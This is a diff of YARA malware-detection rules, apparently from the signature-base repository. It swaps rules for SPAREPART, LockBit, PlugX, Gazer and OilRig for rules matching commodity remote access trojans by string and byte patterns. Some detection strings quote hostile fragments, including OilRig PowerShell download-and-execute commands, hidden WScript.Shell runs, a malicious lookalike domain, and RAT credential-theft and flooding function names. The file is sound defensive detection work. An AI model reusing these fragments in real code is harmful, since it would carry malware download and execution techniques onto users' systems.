-		filesize < 300KB and ( 1 of ( $x* ) or 3 of them )
+		$key and $salt and all of ( $string* )
 }
-rule SIGNATURE_BASE_MAL_Backdoor_SPAREPART_Sleepgenerator
+rule SIGNATURE_BASE_RAT_Imminent
 {
 	meta:
-		description = "Detects the algorithm used to determine the next sleep timer"
-		author = "Mandiant"
-		id = "b9cd46e4-0e06-5ead-8379-adcfc3c384d0"
-		date = "2022-12-14"
+		description = "Detects Imminent RAT"
+		author = "Kevin Breen <kevin@techanarchy.net>"
+		id = "deddef60-c309-54e0-a488-ce937ed7eae3"
+		date = "2014-01-04"
 		modified = "2023-12-05"
-		reference = "https://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_ru_sparepart_dec22.yar#L2-L20"
+		reference = "http://malwareconfig.com/stats/Imminent"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_rats_malwareconfig.yar#L359-L389"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "f9cd5b145e372553dded92628db038d8"
-		logic_hash = "41a9fdb2ba7aefcaf6ef2477b598e98b9045ef17ce9bfe46f3169d0b2e0dd289"
-		score = 50
+		logic_hash = "aebae753c119950b0b3f315c7279866caf15f4d482c0a47912c90885adcf6db2"
+		score = 75
 		quality = 85
 		tags = ""
-		version = "1"
-		weight = "100"
-		disclaimer = "This rule is meant for hunting and is not tested to run in a production environment."
+		maltype = "Remote Access Trojan"
+		filetype = "exe"
 
 	strings:
-		$ = {C1 E8 06 89 [5] C1 E8 02 8B}
-		$ = {c1 e9 03 33 c1 [3] c1 e9 05 33 c1 83 e0 01}
-		$ = {8B 80 FC 00 00 00}
-		$ = {D1 E8 [4] c1 E1 0f 0b c1}
+		$v1a = "DecodeProductKey"
+		$v1b = "StartHTTPFlood"
+		$v1c = "CodeKey"
+		$v1d = "MESSAGEBOX"
+		$v1e = "GetFilezillaPasswords"
+		$v1f = "DataIn"
+		$v1g = "UDPzSockets"
+		$v1h = {52 00 54 00 5F 00 52 00 43 00 44 00 41 00 54 00 41}
+		$v2a = "<URL>k__BackingField"
+		$v2b = "<RunHidden>k__BackingField"
+		$v2c = "DownloadAndExecute"
+		$v2d = "-CHECK & PING -n 2 127.0.0.1 & EXIT" wide
+		$v2e = "england.png" wide
+		$v2f = "Showed Messagebox" wide
 
 	condition:
-		all of them
+		all of ( $v1* ) or all of ( $v2* )
 }
-rule SIGNATURE_BASE_MAL_Backdoor_SPAREPART_Struct : FILE
+rule SIGNATURE_BASE_RAT_Infinity
 {
 	meta:
-		description = "Detects the PDB and a struct used in SPAREPART"
-		author = "Mandiant"
-		id = "a04296d5-c146-5142-a8e8-418651f6b755"
-		date = "2022-12-14"
+		description = "Detects Infinity RAT"
+		author = "Kevin Breen <kevin@techanarchy.net>"
+		id = "b70f9459-fa84-516f-841d-d9617856eb4d"
+		date = "2014-01-04"
 		modified = "2023-12-05"
-		reference = "https://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_ru_sparepart_dec22.yar#L22-L39"
+		reference = "http://malwareconfig.com/stats/Infinity"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_rats_malwareconfig.yar#L391-L414"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "f9cd5b145e372553dded92628db038d8"
-		logic_hash = "807c7404146c08995440987aef78ecde11224f7d6cad1a0d22269b2bf46a44e5"
-		score = 50
+		logic_hash = "c1f5381755af6cfbb10a4769757cdeffb9651bddc76bc4c8e9765ed44bf37fe6"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		disclaimer = "This rule is meant for hunting and is not tested to run in a production environment."
+		tags = ""
+		maltype = "Remote Access Trojan"
+		filetype = "exe"
 
 	strings:
-		$pdb = "c:\\Users\\user\\Desktop\\ImageAgent\\ImageAgent\\PreAgent\\src\\builder\\agent.pdb" ascii nocase
-		$struct = { 44 89 ac ?? ?? ?? ?? ?? 4? 8b ac ?? ?? ?? ?? ?? 4? 83 c5 28 89 84 ?? ?? ?? ?? ?? 89 8c ?? ?? ?? ?? ?? 89 54 ?? ?? 44 89 44 ?? ?? 44 89 4c ?? ?? 44 89 54 ?? ?? 44 89 5c ?? ?? 89 5c ?? ?? 89 7c ?? ?? 89 74 ?? ?? 89 6c ?? ?? 44 89 74 ?? ?? 44 89 7c ?? ?? 44 89 64 ?? ?? 8b 84 ?? ?? ?? ?? ?? 44 8b c8 8b 84 ?? ?? ?? ?? ?? 44 8b c0 4? 8d 15 ?? ?? ?? ?? 4? 8b cd ff 15 ?? ?? ?? ??  }
+		$a = "CRYPTPROTECT_PROMPTSTRUCT"
+		$b = "discomouse"
+		$c = "GetDeepInfo"
+		$d = "AES_Encrypt"
+		$e = "StartUDPFlood"
+		$f = "BATScripting" wide
+		$g = "FBqINhRdpgnqATxJ.html" wide
+		$i = "magic_key" wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and uint32( uint32( 0x3C ) ) == 0x00004550 and $pdb and $struct and filesize < 20KB
+		all of them
 }
-rule SIGNATURE_BASE_Mal_Lockbit4_Packed_Feb24 : FILE
+rule SIGNATURE_BASE_RAT_Lostdoor
 {
 	meta:
-		description = "Detect the packer used by Lockbit4.0"
-		author = "0x0d4y"
-		id = "3c2b2806-9dce-4dce-a7ca-89ebc9005695"
-		date = "2024-02-16"
-		modified = "2025-03-20"
-		reference = "https://0x0d4y.blog/lockbit4-0-evasion-tales/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_lockbit4_packed_win_feb24.yar#L1-L25"
+		description = "Detects LostDoor RAT"
+		author = "Kevin Breen <kevin@techanarchy.net>"
+		id = "f86ae7a1-2182-5b2e-8f9e-9e8456f574bc"
+		date = "2014-01-04"
+		modified = "2023-12-05"
+		reference = "http://malwareconfig.com/stats/LostDoor"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_rats_malwareconfig.yar#L440-L465"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "15796971d60f9d71ad162060f0f76a02"
-		logic_hash = "07281fd86efbb7167ba1cc0c6f6897418751df1a3697869e51f806c26641e365"
-		score = 100
+		logic_hash = "7ffa6f5cbeacca5a1e750e35d8296658d4e280078a61f94fd5f2d4b7c800bb44"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "CC BY 4.0"
-		rule_matching_tlp = "TLP:WHITE"
-		rule_sharing_tlp = "TLP:WHITE"
-		malpedia_family = "win.lockbit"
+		tags = ""
+		maltype = "Remote Access Trojan"
+		filetype = "exe"
 
 	strings:
-		$unpacking_loop_64b = { 8b 1e 48 83 ee fc 11 db 8a 16 72 e5 8d 41 01 41 ff d3 11 c0 01 db 75 0a }
-		$jump_to_unpacked_code_64b = { 48 8b 2d 16 0f ?? ?? 48 8d be 00 f0 ?? ?? bb 00 ?? ?? ?? 50 49 89 e1 41 b8 04 ?? ?? ?? 53 5a 90 57 59 90 48 83 ec ?? ff d5 48 8d 87 ?? ?? ?? ?? 80 20 ?? 80 60 ?? ?? 4c 8d 4c 24 ?? 4d 8b 01 53 90 5a 90 57 59 ff d5 48 83 c4 ?? 5d 5f 5e 5b 48 8d 44 24 ?? 6a ?? 48 39 c4 75 f9 48 83 ec ?? e9 }
-		$unpacking_loop_32b = { 8A 06 46 88 07 47 01 DB 75 ?? 8B 1E 83 EE ?? 11 DB 72 ?? 9C 29 C0 40 9D 01 DB 75 ?? 8B 1E 83 EE ?? 11 DB 11 C0 01 DB 73 ?? 75 ?? 8B 1E 83 EE ?? 11 DB 73 }
-		$jump_to_unpacked_code_32b = { 8b ae ?? ?? ?? ?? 8d be 00 f0 ?? ?? bb 00 ?? ?? ?? 50 54 6a 04 53 57 ff d5 8d 87 ?? ?? ?? ?? 80 20 ?? 80 60 ?? ?? 58 50 54 50 53 57 ff d5 58 8d 9e 00 f0 ?? ?? 8d bb ?? ?? ?? ?? 57 31 c0 aa 59 49 50 6a 01 53 ff d1 61 8d 44 24 ?? 6a ?? 39 c4 75 fa 83 ec ?? e9 }
+		$a0 = {0D 0A 2A 45 44 49 54 5F 53 45 52 56 45 52 2A 0D 0A}
+		$a1 = "*mlt* = %"
+		$a2 = "*ip* = %"
+		$a3 = "*victimo* = %"
+		$a4 = "*name* = %"
+		$b5 = "[START]"
+		$b6 = "[DATA]"
+		$b7 = "We Control Your Digital World" wide ascii
+		$b8 = "RC4Initialize" wide ascii
+		$b9 = "RC4Decrypt" wide ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 1 of ( $jump_to_unpacked_code_* ) and 1 of ( $unpacking_loop_* )
+		all of ( $a* ) or all of ( $b* )
 }
-rule SIGNATURE_BASE_Apt_Backspace : FILE
+rule SIGNATURE_BASE_RAT_Luminositylink
 {
 	meta:
-		description = "Detects APT backspace"
-		author = "Bit Byte Bitten"
-		id = "3da3337d-b6d3-5661-b43e-535e06817303"
-		date = "2015-05-14"
+		description = "Detects LuminosityLink RAT"
+		author = "Kevin Breen <kevin@techanarchy.net>"
+		id = "163fe10c-38a1-53d3-b3a5-4240229e0306"
+		date = "2014-01-04"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_backspace.yar#L6-L19"
+		reference = "http://malwareconfig.com/stats/LuminosityLink"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_rats_malwareconfig.yar#L467-L493"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "6cbfeb7526de65eb2e3c848acac05da1e885636d17c1c45c62ad37e44cd84f99"
-		logic_hash = "6fa86ada5c965bd9c199c2a1cf9b691499a3d423da7db50c8987b6725c0c0f29"
+		logic_hash = "5e70e3e0885d098f1ac2bcc324cd8ad2682fbfc395f189cabc4a4f97a0109682"
 		score = 75
-		quality = 85
-		tags = "FILE"
+		quality = 60
+		tags = ""
+		maltype = "Remote Access Trojan"
+		filetype = "exe"
 
 	strings:
-		$s1 = "!! Use Splice Socket !!"
-		$s2 = "User-Agent: SJZJ (compatible; MSIE 6.0; Win32)"
-		$s3 = "g_nAV=%d,hWnd:0x%X,className:%s,Title:%s,(%d,%d,%d,%d),BOOL=%d"
+		$a = "SMARTLOGS" wide
+		$b = "RUNPE" wide
+		$c = "b.Resources" wide
+		$d = "CLIENTINFO*" wide
+		$e = "Invalid Webcam Driver Download URL, or Failed to Download File!" wide
+		$f = "Proactive Anti-Malware has been manually activated!" wide
+		$g = "REMOVEGUARD" wide
+		$h = "C0n1f8" wide
+		$i = "Luminosity" wide
+		$j = "LuminosityCryptoMiner" wide
+		$k = "MANAGER*CLIENTDETAILS*" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		all of them
 }
-
-rule SIGNATURE_BASE_MAL_Exilerat_Feb19_1 : FILE
+rule SIGNATURE_BASE_RAT_Luxnet
 {
 	meta:
-		description = "Detects Exile RAT"
-		author = "Florian Roth (Nextron Systems)"
-		id = "f0a510f3-5fea-59a7-8991-9d06dc478b2a"
-		date = "2019-02-04"
+		description = "Detects LuxNet RAT"
+		author = "Kevin Breen <kevin@techanarchy.net>"
+		id = "277db509-5ba0-5d1b-b17a-d5914f1f1650"
+		date = "2014-01-04"
 		modified = "2023-12-05"
-		reference = "https://creativecommons.org/licenses/by-nc/4.0/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_exile_rat.yar#L4-L26"
+		reference = "http://malwareconfig.com/stats/LuxNet"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_rats_malwareconfig.yar#L495-L516"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0556bc0dbd33502d5bf823cf265a4e133d9af43076abe35a86cf5e20ab314e35"
+		logic_hash = "55d872e2e30f6d55a6f91750bbb52675042e4673d712a4f2417af43b0f2c4fb9"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		hash1 = "3eb026d8b778716231a07b3dbbdc99e2d3a635b1956de8a1e6efc659330e52de"
+		tags = ""
+		maltype = "Remote Access Trojan"
+		filetype = "exe"
 
 	strings:
-		$x1 = "Content-Disposition:form-data;name=\"x.bin\"" fullword ascii
-		$s1 = "syshost.dll" fullword ascii
-		$s2 = "\\scout\\Release\\scout.pdb" ascii
-		$s3 = "C:\\data.ini" fullword ascii
-		$s4 = "my-ip\" value=\"" fullword ascii
-		$s5 = "ver:%d.%d.%d" fullword ascii
+		$a = "GetHashCode"
+		$b = "Activator"
+		$c = "WebClient"
+		$d = "op_Equality"
+		$e = "dickcursor.cur" wide
+		$f = "{0}|{1}|{2}" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 500KB and ( pe.imphash ( ) == "da8475fc7c3c90c0604ce6a0b56b5f21" or 3 of them )
+		all of them
 }
-rule SIGNATURE_BASE_Aptgroupx_Plugxtrojanloader_Stringdecode
+rule SIGNATURE_BASE_RAT_Netwire
 {
 	meta:
-		description = "Rule to detect PlugX Malware"
-		author = "Jay DiMartino"
-		id = "c6017327-b44d-5b1d-95aa-6e1f9fbf5583"
-		date = "2023-12-05"
+		description = "Detects NetWire RAT"
+		author = "Kevin Breen <kevin@techanarchy.net> & David Cannings"
+		id = "f0077e8c-3e6a-5a98-9171-b0d81f24d27a"
+		date = "2014-01-04"
 		modified = "2023-12-05"
-		reference = "https://t.co/4xQ8G2mNap"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_plugx.yar#L2-L36"
+		reference = "http://malwareconfig.com/stats/NetWire"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_rats_malwareconfig.yar#L547-L569"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e5ab15b035bb0169864e687e5c26732dd5b8f5f184473a33e685f53699ce4acc"
-		score = 80
-		quality = 85
+		logic_hash = "6a4e757262c02dfe46ac28940b53a5695df2d242ccd4c16b42fbfdcf96072e91"
+		score = 75
+		quality = 60
 		tags = ""
-		hash1 = "0535e8c300204e257f0fa57630f386e9fcc8e779"
-		hash2 = "088ebf9ccde958f32d11f4e7eb14f5332332f97d"
-		hash3 = "0c999d0bffa007e9e6b6fe593933b52f40c75b3d"
-		hash4 = "2f644e7131ec0a4f12ce04ba1e54d23856dbbfbf"
-		hash5 = "3be9148ad132ca342d5fbabea1119a175ef1df7c"
-		hash6 = "4c1ee94ec0e15491fc4f6b4095f67eee6309e62a"
-		hash7 = "587af7ce05e61d4c312d6bae12ea380116b08d7e"
-		hash8 = "5990efd83b5646a7ba419541d3a2c19260224ca3"
-		hash9 = "67970367c250c44a5feb263843cf45fd91336df5"
-		hash10 = "68f53f7188910a4cf67843aedd38c1523f1f2e7c"
-		hash11 = "962dc7e0ad37286df012f623423ac4182fe791ca"
-		hash12 = "aa0976906807af2e1b127608040aa3ef6e118a13"
-		hash13 = "b170d015e32b39fa4ac15f94d58e45e65cd16d6c"
-		hash14 = "c9b3d2cef3b34c7ee18fc2f60ff022965959613d"
-		hash15 = "cd425ce7f3e4a823d9027780e1b439759c4dc665"
-		hash16 = "d5e82513c6472d3826a22d9a15c05af8c0d33b58"
-		hash17 = "d9b32084f27ef13001060e1dcee8a1a9e95d89a6"
-		hash18 = "daa2d1cb9148b7ba5a86fa9ab593678e77c92672"
-		hash19 = "e2c098a95d1c1f0e29f207af9c5ffc5bd69a92ee"
-		hash20 = "ef8cf68dc3c80e9cb5a3fa0f92b544eab583812e"
-		hash21 = "f0fc0a4e4e0748464caa6a202d0083cd33458677"
-		hash22 = "fe1abe55529c1d6aa6b2a2f02d7e41ea58040feb"
+		maltype = "Remote Access Trojan"
+		filetype = "exe"
 
 	strings:
-		$byte1 = { 8A [2-4] 8A [2-4] FF 05 00 30 00 10 [0-5] 2A [1-6] 80 [2-7] 02 [1-6] 88 0? }
-		$byte2 = { 8B [2-4] 8A [2-4] FF 05 00 30 00 10 [0-5] 2A [1-6] 80 [2-7] 02 [1-6] 88 0? }
+		$exe1 = "%.2d-%.2d-%.4d"
+		$exe2 = "%s%.2d-%.2d-%.4d"
+		$exe3 = "[%s] - [%.2d/%.2d/%d %.2d:%.2d:%.2d]"
+		$exe4 = "wcnwClass"
+		$exe5 = "[Ctrl+%c]"
+		$exe6 = "SYSTEM\\CurrentControlSet\\Control\\ProductOptions"
+		$exe7 = "%s\\.purple\\accounts.xml"
 
 	condition:
-		any of them
+		all of them
 }
-rule SIGNATURE_BASE_Gazer_Certificate_1 : FILE
+rule SIGNATURE_BASE_RAT_Pandora
 {
 	meta:
-		description = "Detects Tura's Gazer malware"
-		author = "ESET"
-		id = "4eace653-003e-5cae-9db8-f26502f35fc4"
-		date = "2017-08-30"
+		description = "Detects Pandora RAT"
+		author = "Kevin Breen <kevin@techanarchy.net>"
+		id = "d31e4366-8911-5c9c-92dc-a99f5233c626"
+		date = "2014-01-04"
 		modified = "2023-12-05"
-		reference = "https://www.welivesecurity.com/2017/08/30/eset-research-cyberespionage-gazer/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_turla_gazer.yar#L27-L39"
+		reference = "http://malwareconfig.com/stats/Pandora"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_rats_malwareconfig.yar#L571-L599"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ef248ac5cdde0034d940f80b32966fe64841dcf99923dfc0a7035354af963f56"
+		logic_hash = "d33598d0699bfb7e996047318099302c2c326e45d993a259c2bc145acf8cf54b"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
+		maltype = "Remote Access Trojan"
+		filetype = "exe"
 
 	strings:
-		$certif1 = { 52 76 a4 53 cd 70 9c 18 da 65 15 7e 5f 1f de 02 }
-		$certif2 = { 12 90 f2 41 d9 b2 80 af 77 fc da 12 c6 b4 96 9c }
+		$a = "Can't get the Windows version"
+		$b = "=M=Q=U=Y=]=a=e=i=m=q=u=y=}="
+		$c = "JPEG error #%d" wide
+		$d = "Cannot assign a %s to a %s" wide
+		$g = "%s, ProgID:"
+		$h = "clave"
+		$i = "Shell_TrayWnd"
+		$j = "melt.bat"
+		$k = "\\StubPath"
+		$l = "\\logs.dat"
+		$m = "1027|Operation has been canceled!"
+		$n = "466|You need to plug-in! Double click to install... |"
+		$0 = "33|[Keylogger Not Activated!]"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 1 of them and filesize < 2MB
+		all of them
 }
-rule SIGNATURE_BASE_Gazer_Logfile_Name_1 : FILE
+rule SIGNATURE_BASE_RAT_Paradox
 {
 	meta:
-		description = "Detects Tura's Gazer malware"
-		author = "ESET"
-		id = "c10d440f-dc9e-54c8-b329-9f22cba05e86"
-		date = "2017-08-30"
+		description = "Detects Paradox RAT"
+		author = "Kevin Breen <kevin@techanarchy.net>"
+		id = "2f1e6226-799b-54eb-a4a4-6c0f1bf561b4"
+		date = "2014-01-04"
 		modified = "2023-12-05"
-		reference = "https://www.welivesecurity.com/2017/08/30/eset-research-cyberespionage-gazer/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_turla_gazer.yar#L41-L54"
+		reference = "http://malwareconfig.com/stats/Paradox"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_rats_malwareconfig.yar#L601-L623"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c893ec41884f106329350c079b087e41a5b9f1040ab0892c90c03972d49dc070"
+		logic_hash = "fef41262b78a497c65c7548c58d78ba8912725b28606fd9e99d1dbc19bdf7393"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
+		maltype = "Remote Access Trojan"
+		filetype = "exe"
 
 	strings:
-		$s1 = "CVRG72B5.tmp.cvr"
-		$s2 = "CVRG1A6B.tmp.cvr"
-		$s3 = "CVRG38D9.tmp.cvr"
+		$a = "ParadoxRAT"
+		$b = "Form1"
+		$c = "StartRMCam"
+		$d = "Flooders"
+		$e = "SlowLaris"
+		$f = "SHITEMID"
+		$g = "set_Remote_Chat"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 1 of them
+		all of them
 }
-rule SIGNATURE_BASE_Oilrig_Malware_Campaign_Gen1 : FILE
+rule SIGNATURE_BASE_RAT_Plasma
 {
 	meta:
-		description = "Detects malware from OilRig Campaign"
-		author = "Florian Roth (Nextron Systems)"
-		id = "d291edf1-b086-5c61-b131-61c9f6e1267b"
-		date = "2016-10-12"
+		description = "Detects Plasma RAT"
+		author = "Kevin Breen <kevin@techanarchy.net>"
+		id = "2a19c0de-0078-5487-869c-1bcabea57300"
+		date = "2014-01-04"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/QMRZ8K"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_oilrig.yar#L12-L67"
+		reference = "http://malwareconfig.com/stats/Plasma"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_rats_malwareconfig.yar#L625-L649"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "17dbf53ba6e27b230e3357963162a1805c6460cdadce8bba68953a97f699e1b7"
+		logic_hash = "e73348d379c483a7917cf765a457739aed6940f180272fa8d0c0dd1eb8e5f562"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "d808f3109822c185f1d8e1bf7ef7781c219dc56f5906478651748f0ace489d34"
-		hash2 = "80161dad1603b9a7c4a92a07b5c8bce214cf7a3df897b561732f9df7920ecb3e"
-		hash3 = "662c53e69b66d62a4822e666031fd441bbdfa741e20d4511c6741ec3cb02475f"
-		hash4 = "903b6d948c16dc92b69fe1de76cf64ab8377893770bf47c29bf91f3fd987f996"
-		hash5 = "c4fbc723981fc94884f0f493cb8711fdc9da698980081d9b7c139fcffbe723da"
-		hash6 = "57efb7596e6d9fd019b4dc4587ba33a40ab0ca09e14281d85716a253c5612ef4"
-		hash7 = "1b2fee00d28782076178a63e669d2306c37ba0c417708d4dc1f751765c3f94e1"
-		hash8 = "9f31a1908afb23a1029c079ee9ba8bdf0f4c815addbe8eac85b4163e02b5e777"
-		hash9 = "0cd9857a3f626f8e0c07495a4799c59d502c4f3970642a76882e3ed68b790f8e"
-		hash10 = "4b5112f0fb64825b879b01d686e8f4d43521252a3b4f4026c9d1d76d3f15b281"
-		hash11 = "4e5b85ea68bf8f2306b6b931810ae38c8dff3679d78da1af2c91032c36380353"
-		hash12 = "c3c17383f43184a29f49f166a92453a34be18e51935ddbf09576a60441440e51"
-		hash13 = "f3856c7af3c9f84101f41a82e36fc81dfc18a8e9b424a3658b6ba7e3c99f54f2"
-		hash14 = "0c64ab9b0c122b1903e8063e3c2c357cbbee99de07dc535e6c830a0472a71f39"
-		hash15 = "d874f513a032ccb6a5e4f0cd55862b024ea0bee4de94ccf950b3dd894066065d"
-		hash16 = "8ee628d46b8af20c4ba70a2fe8e2d4edca1980583171b71fe72455c6a52d15a9"
-		hash17 = "55d0e12439b20dadb5868766a5200cbbe1a06053bf9e229cf6a852bfcf57d579"
-		hash18 = "528d432952ef879496542bc62a5a4b6eee788f60f220426bd7f933fa2c58dc6b"
-		hash19 = "93940b5e764f2f4a2d893bebef4bf1f7d63c4db856877020a5852a6647cb04a0"
-		hash20 = "e2ec7fa60e654f5861e09bbe59d14d0973bd5727b83a2a03f1cecf1466dd87aa"
-		hash21 = "9c0a33a5dc62933f17506f20e0258f877947bdcd15b091a597eac05d299b7471"
-		hash22 = "a787c0e42608f9a69f718f6dca5556607be45ec77d17b07eb9ea1e0f7bb2e064"
-		hash23 = "3772d473a2fe950959e1fd56c9a44ec48928f92522246f75f4b8cb134f4713ff"
-		hash24 = "3986d54b00647b507b2afd708b7a1ce4c37027fb77d67c6bc3c20c3ac1a88ca4"
-		hash25 = "f5a64de9087b138608ccf036b067d91a47302259269fb05b3349964ca4060e7e"
+		tags = ""
+		maltype = "Remote Access Trojan"
+		filetype = "exe"
 
 	strings:
-		$x1 = "Get-Content $env:Public\\Libraries\\update.vbs) -replace" ascii
-		$x2 = "wss.Run \"powershell.exe \" & Chr(34) & \"& {waitfor haha /T 2}\" & Chr(34), 0" fullword ascii
-		$x3 = "Call Extract(UpdateVbs, wss.ExpandEnvironmentStrings(\"%PUBLIC%\") & \"\\Libraries\\update.vbs\")" fullword ascii
-		$s4 = "CreateObject(\"WScript.Shell\").Run cmd, 0o" fullword ascii
-		$b1 = "JGdsb2JhbDpteWhvc3QgP" ascii
-		$b2 = "SE9NRT0iJXB1YmxpYyVcTGlicmFyaWVzX" ascii
-		$b3 = "U2V0IHdzcyA9IENyZWF0ZU9iamVjdCgid1NjcmlwdC5TaGV" ascii
-		$b4 = "JHNjcmlwdGRpciA9IFNwbGl0LVBhdGggLVBhcmVudCAtUGF0aCA" ascii
-		$b5 = "DQpTZXQgd3NzID0gQ3JlYXRlT2JqZWN" ascii
-		$b6 = "d2hvYW1pICYgaG9zdG5hb" ascii
+		$a = "Miner: Failed to Inject." wide
+		$b = "Started GPU Mining on:" wide
+		$c = "BK: Hard Bot Killer Ran Successfully!" wide
+		$d = "Uploaded Keylogs Successfully!" wide
+		$e = "No Slowloris Attack is Running!" wide
+		$f = "An ARME Attack is Already Running on" wide
+		$g = "Proactive Bot Killer Enabled!" wide
+		$h = "PlasmaRAT" wide ascii
+		$i = "AntiEverything" wide ascii
 
 	condition:
-		( uint16( 0 ) == 0xcfd0 and filesize < 700KB and 1 of them )
+		all of them
 }
-rule SIGNATURE_BASE_Oilrig_Malware_Campaign_Mal1 : FILE
+rule SIGNATURE_BASE_RAT_Poisonivy
 {
 	meta:
-		description = "Detects malware from OilRig Campaign"
-		author = "Florian Roth (Nextron Systems)"
-		id = "c577f0ff-1a33-5d7f-93b2-27df8d414bce"
-		date = "2016-10-12"
+		description = "Detects PoisonIvy RAT"
+		author = "Kevin Breen <kevin@techanarchy.net>"
+		id = "371686d3-878f-56fc-a702-ec49845f486b"
+		date = "2014-01-04"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/QMRZ8K"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_oilrig.yar#L69-L86"
+		reference = "http://malwareconfig.com/stats/PoisonIvy"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_rats_malwareconfig.yar#L651-L672"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b5fc4329bb639765890c49907860883b96d278381b83307c906f624e6645dedd"
+		logic_hash = "874e0dfb22a03abc0f7fdc7209ff13b55dfa5dcc17db944903ca37a549eb331d"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "e17e1978563dc10b73fd54e7727cbbe95cc0b170a4e7bd0ab223e059f6c25fcc"
+		tags = ""
+		maltype = "Remote Access Trojan"
+		filetype = "exe"
 
 	strings:
-		$x1 = "DownloadExecute=\"powershell \"\"&{$r=Get-Random;$wc=(new-object System.Net.WebClient);$wc.DownloadFile(" ascii
-		$x2 = "-ExecutionPolicy Bypass -File \"&HOME&\"dns.ps1\"" fullword ascii
-		$x3 = "CreateObject(\"WScript.Shell\").Run Replace(DownloadExecute,\"-_\",\"bat\")" fullword ascii
-		$x4 = "CreateObject(\"WScript.Shell\").Run DnsCmd,0" fullword ascii
-		$s1 = "http://winodwsupdates.me" ascii
+		$stub = {04 08 00 53 74 75 62 50 61 74 68 18 04}
+		$string1 = "CONNECT %s:%i HTTP/1.0"
+		$string2 = "ws2_32"
+		$string3 = "cks=u"
+		$string4 = "thj@h"
+		$string5 = "advpack"
 
 	condition:
-		( uint16( 0 ) == 0x4f48 and filesize < 4KB and 1 of them ) or ( 2 of them )
+		$stub at 0x1620 and all of ( $string* ) or ( all of them )
 }
-rule SIGNATURE_BASE_Oilrig_Malware_Campaign_Gen2 : FILE
+rule SIGNATURE_BASE_RAT_Predatorpain
 {
 	meta:
-		description = "Detects Oilrig malware samples"
-		author = "Florian Roth (Nextron Systems)"
-		id = "2ca0aadf-c5a8-5c89-ab1e-0c06d2ab8516"
-		date = "2016-10-12"
-		modified = "2023-01-07"
